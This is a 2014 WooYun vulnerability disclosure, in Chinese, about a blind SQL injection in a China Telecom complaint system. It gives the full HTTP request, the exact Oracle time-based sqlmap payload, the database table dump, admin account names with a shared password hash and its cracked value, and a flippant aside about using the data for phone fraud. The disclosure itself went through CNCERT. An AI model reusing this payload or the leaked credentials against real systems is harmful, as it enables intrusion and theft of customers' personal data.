当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-087930

漏洞标题:中国电信某系统SQL注入泄露用户信息可用于电话诈骗

相关厂商:中国电信

漏洞作者: 小饼仔

提交时间:2014-12-20 14:08

修复时间:2015-02-03 14:10

公开时间:2015-02-03 14:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-20: 细节已通知厂商并且等待厂商处理中
2014-12-25: 厂商已经确认,细节仅向厂商公开
2015-01-04: 细节向核心白帽子及相关领域专家公开
2015-01-14: 细节向普通白帽子公开
2015-01-24: 细节向实习白帽子公开
2015-02-03: 细节向公众公开

简要描述:

用户咨询、投诉和个人信息泄露,可以假装客服,用来诈骗定是极好的~
貌似还是全国的~
然后新闻就会有头条,XXX被“电信客服”电话诈骗~

详细说明:

中国电信在线投诉
链接:http://61.129.250.80//workorder-web/wod/onlineCompla/checkList.html

222.png


输入姓名、电话、验证码后,burp拦截到两个POST请求,第一个是去验证验证码的,第二个是去真正查询,第二个请求中没有带验证码

333.png


请求如下

POST /workorder-web/wod/onlineCompla/checkList.html HTTP/1.1
Host: 61.129.250.80
Proxy-Connection: keep-alive
Content-Length: 38
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://61.129.250.80
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://61.129.250.80/workorder-web/wod/onlineCompla/suitinput.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: JSESSIONID=0000FTrVXaJQGckZjIumLxRu9Mg:17uhj20ni
RA-Ver: 2.8.1
RA-Sid: 65E7C870-20141208-023412-580933-2bd67e
custName=111&fasttipsContactNumber=111


漏洞证明:

丢到sqlmap,customName存在延时盲注
14个数据库

444.png


当前数据库MCS,有478张表

555.png


我们来看下数据量,几百万

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: custName
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: custName=111%' AND 8284=DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(103)||CHR(104)||CHR(110),5) AND '%'='&fasttipsContactNumber=111
---
web application technology: JSP
back-end DBMS: Oracle
Database: MCS
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| T_INTERFACE_LOG                | 4208030 |
| WF_H_WIPARTICIPANT             | 2974894 |
| WF_H_WIPARTICIPANT_1029        | 2574769 |
| T_WORKORDER_INFO               | 2409132 |
| WFACTIVITYINST                 | 1737428 |
| WFTRANSITION                   | 1482027 |
| T_SYS_LOG                      | 1445845 |
| T_WORKORDER_INFO_BAK           | 1436723 |
| WFTRANSITION_1029              | 1268720 |
| WFWORKITEM                     | 1252966 |
| WFTRANSCTRL_1029               | 1238509 |
| WFWORKITEM_1029                | 1070184 |
| T_COMPLAINT_INFO               | 473412  |
| T_COMPLAINT_WORKORDER_EXT      | 473412  |
| T_COMPLAINT_WORKORDER          | 469910  |
| T_CUST_INFO                    | 418101  |
| T_WORKORDER_OTHER              | 411582  |
| T_COMPLAINT_WORKORDER_20140822 | 310523  |
| T_COMPLAINT_WORKORDER_20140821 | 308788  |
| WFPROCESSINST                  | 255402  |
| WFPROCESSINSTATTR              | 254780  |
| T_WORKORDER_REMIND             | 250485  |
| T_COMPLAINT_WORKORDER_0624     | 238735  |
| WFPROCESSINST_1029             | 218863  |
| WFPROCESSINSTATTR_1029         | 218280  |
| WFWIPARTICIPANT                | 200373  |
| T_COMPLAINT_WORKORDER_1404_ALL | 184583  |
| T_WORKORDER_INFO_WUHQ          | 163707  |
| T_WORKORDER_INFO_1108          | 163697  |
| WFWIPARTICIPANT_1029           | 152897  |
| T_REP_ICS_REASON_PROV          | 105915  |
| T_SYS_ATTACHMENT               | 103014  |
| T_REP_ICS_REASON_DUTY          | 93885   |
| T_REP_ICS_BUSI_PROV            | 82765   |
| T_WORKORDER_OTHER_WANGYK       | 64959   |
| TMP_00003                      | 54785   |
| TMP_00004                      | 54785   |
| T_SYS_ERROR_LOG                | 52320   |
...


然后找了找,发现这个

111.png


到数据库找了下登陆账号密码对应的表,找到T_SYS_USER这个表,共有1137个账号,下面列举部分

select USER_ACCOUNT, USER_PASSWORD from T_SYS_USER; [1137]:
[*] changchun, lueSGJZetyySpUndWjMBEg==
[*] jilin, lueSGJZetyySpUndWjMBEg==
[*] yanbian, lueSGJZetyySpUndWjMBEg==
[*] siping, lueSGJZetyySpUndWjMBEg==
[*] tonghua, lueSGJZetyySpUndWjMBEg==
[*] baicheng, lueSGJZetyySpUndWjMBEg==
[*] songyuan, lueSGJZetyySpUndWjMBEg==
[*] liaoyuan, lueSGJZetyySpUndWjMBEg==
[*] baishan, lueSGJZetyySpUndWjMBEg==
[*] 河北邯郸, lueSGJZetyySpUndWjMBEg==
[*] hebeibaoding, lueSGJZetyySpUndWjMBEg==
[*] 河北张家口, lueSGJZetyySpUndWjMBEg==
[*] 河北承德, lueSGJZetyySpUndWjMBEg==
[*] 河北唐山, lueSGJZetyySpUndWjMBEg==
.....


密码解密之,为111111
随便找一个登陆,里面有咨询投诉的记录,应该是对应全国,每个归属地都有,近20W条

666.png


找几个看一看,各种被乱开通服务的投诉,都是坑!
1.

777.png

777-2.png

777-3.png


2.

888.png


3.

999.png


其他不一一列举了。
下面来说一下危害,如果诈骗的人得到这些信息,可以假装客服,然后打回去,然后就用各种理由来进行诈骗,因为有的咨询投诉里面还有客户的身份证号码、联系地址等等,客户基本都会相信,然后新闻的就出现,XXX被“电信工作人员”诈骗!

修复方案:

~

版权声明:转载请注明来源 小饼仔@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-12-25 09:05

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理单位处置.按信息泄露和运行安全风险评分,rank 15

最新状态:

暂无